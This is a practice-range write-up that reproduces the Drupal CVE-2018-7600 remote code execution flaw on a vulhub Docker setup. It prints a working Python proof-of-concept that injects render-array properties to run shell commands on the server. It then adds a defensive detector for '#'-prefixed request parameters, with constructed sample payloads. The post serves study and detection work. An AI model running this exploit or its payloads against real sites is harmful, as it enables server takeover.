The practice ranges I have been working on lately all happened to use this vulnerability, so here is a proper reproduction. The target is the Drupal CMS framework.
Setting up the vulnerable environment
The environment is built with the vulhub vulnerability range. It is advisable to configure an Alibaba Cloud registry mirror for Docker first, otherwise pulling the image takes a very long time.
Create a daemon.json file under /etc/docker
and write:
{ "registry-mirrors":["https://6kx4zyno.mirror.aliyuncs.com"] }
Then run
systemctl daemon-reload (reload the unit files)
systemctl restart docker (restart the Docker service)
With docker-compose up -d the vulnerable environment comes up quickly, usually within half a minute.
Start the Docker container
Visit port 8080
Installation complete
Exploiting the vulnerability
import sys
import requests

print('################################################################')
print('# Proof-Of-Concept for CVE-2018-7600')
print('# by Vitalii Rudnykh')
print('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print('# https://github.com/a2u/CVE-2018-7600')
print('################################################################')
print('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ')

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
#verify = False
proxies = {}
verify = True

# The AJAX form endpoint; element_parents points at the #value property of the mail field
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
# The form data injects render-array properties (#post_render, #type, #markup) through user input
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
# send the malicious request
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
# verify: the command above should have written hello.txt into the web root
check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
    sys.exit("Not exploitable")
print('\nCheck: ' + target + 'hello.txt')
hello.txt does indeed exist on the web server, which shows that the injected command was executed.
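The request above is easy to recognise on the defending side: the element_parents query parameter names a render-array property (account/mail/#value) and the form data carries keys beginning with '#' (mail[#post_render][], mail[#type], mail[#markup]), which no legitimate form submission sends. The fix Drupal shipped in SA-CORE-2018-002 strips such '#'-prefixed keys from incoming request data, so the same indicator is what a log or WAF check can key on. The following detector is an added example written for this post; it is not code from the original article or from the a2u PoC repository, and the request records it scans are constructed samples, not real captures.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (method, request target, POST body); these are
# illustrative records, not real captures. The second one mirrors the shape of
# the PoC request shown above: '#value' inside element_parents and '#'-prefixed
# keys such as mail[#post_render][] in the form data.
SAMPLE_REQUESTS = [
    ("POST", "/user/register",
     "form_id=user_register_form&name=alice&mail=alice%40example.org"),
    ("POST", "/user/register?element_parents=account/mail/%23value"
             "&ajax_form=1&_wrapper_format=drupal_ajax",
     "form_id=user_register_form&_drupal_ajax=1"
     "&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup"
     "&mail%5B%23markup%5D=id"),
    # Legitimate Drupal AJAX form rebuild: element_parents names an ordinary field path
    ("POST", "/node/add/article?element_parents=field_image/widget/0"
             "&ajax_form=1&_wrapper_format=drupal_ajax",
     "form_id=node_article_form&_drupal_ajax=1"
     "&_triggering_element_name=field_image_0_upload_button"),
    ("GET", "/hello.txt", ""),
]


def property_keys(params):
    """Return parameter names that carry a '#' (a Drupal render-array property)."""
    return sorted(k for k in params if "#" in k)


def analyze_request(method, target, body):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    parts = urlsplit(target)
    # parse_qs percent-decodes, so %23 in the raw request becomes '#' here
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True) if body else {}
    findings = []
    for value in query.get("element_parents", []):
        if "#" in value:
            findings.append(f"element_parents points at a render property: {value}")
    keys = property_keys(query) + property_keys(form)
    if keys:
        findings.append("render-array property keys in user input: " + ", ".join(keys))
    return findings


def scan(records):
    """Return (index, findings) for each record that triggers at least one finding."""
    hits = []
    for i, (method, target, body) in enumerate(records):
        findings = analyze_request(method, target, body)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS):
        print(f"request {i}:")
        for finding in findings:
            print("  -", finding)
```

Only the second constructed record is flagged: the ordinary registration and the legitimate AJAX rebuild (whose element_parents value is a plain field path) pass, and the later GET for hello.txt carries no parameters at all. Matching on '#' in parameter names and in element_parents, rather than on the specific strings from this PoC, is deliberate, since the same injection works against other form fields and properties.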
References
https://blog.csdn.net/qq_51295677/article/details/131975245
https://blog.nsfocus.net/cve-2018-7600-analysis/
https://xz.aliyun.com/t/2271?time__1311=n4%2BxnieDq7qCqAKDtKDsf32r7GO7DgD3oggYD
https://paper.seebug.org/567/